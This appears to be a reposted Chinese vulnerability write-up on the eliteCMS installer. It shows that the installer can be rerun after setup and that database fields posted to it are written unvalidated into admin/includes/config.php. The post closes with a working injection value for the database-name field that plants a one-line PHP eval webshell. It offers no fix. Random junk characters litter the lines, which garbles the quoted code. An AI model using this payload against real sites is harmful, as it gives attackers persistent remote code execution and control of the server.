eliteCMS安装文件未验证 + 一句话写入安全漏洞

admin

eliteCMS的安装程序安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装

另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
2 b8 H& F! }& U8 U我们来看代码：

...
elseif ($_GET['step'] == "4") {
( h2 b+ r& M, }& _$ N    $file = "../admin/includes/config.php";
2 x4 N' J* V: M  f. P9 h: J    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
, C! R; w/ W* r+ U, T$ Z/ ]    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
( }' j4 i+ U: H+ h1 y...略...
# g6 ~. G* P0 U+ _. Z/ W. w    $write .= "*\n";
    $write .= "*/\n";
$ v& Y, D! Q9 W/ j    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
+ B" w6 a5 D# ?    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
' g2 F$ k7 z! F' O3 R' I    $write .= "        \n";
9 _$ X" m4 y* J$ q3 |    $write .= "} \n";
; X7 p, v0 ^8 q$ a& u0 ]    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
: Z; u/ Q) v( G, G    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
$ B5 J3 O7 a1 ^) M    $write .= "        \n";
$ N# H4 z* b7 q3 J# i    $write .= "} \n";
/ I- z! S8 Y" C; n" \# }    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

% l( q! {% r6 ]* G8 ^# f在看代码：

6 n) m( A- O! g. @$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
) e" H$ n, I6 L% F$_SESSION['DB_USER'] = $_POST['DB_USER'];
; E4 L7 t/ p9 I6 p! `8 P0 m0 P+ ~$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

& W8 D& s$ C+ g6 ^取值未作任何验证
5 f# g$ _$ Y% {- m2 s如果将数据库名POST数据：
1 X) a; T+ |, H- s9 }
"?><?php eval($_POST[c]);?><?php

将导致一句话后门写入/admin/includes/config.php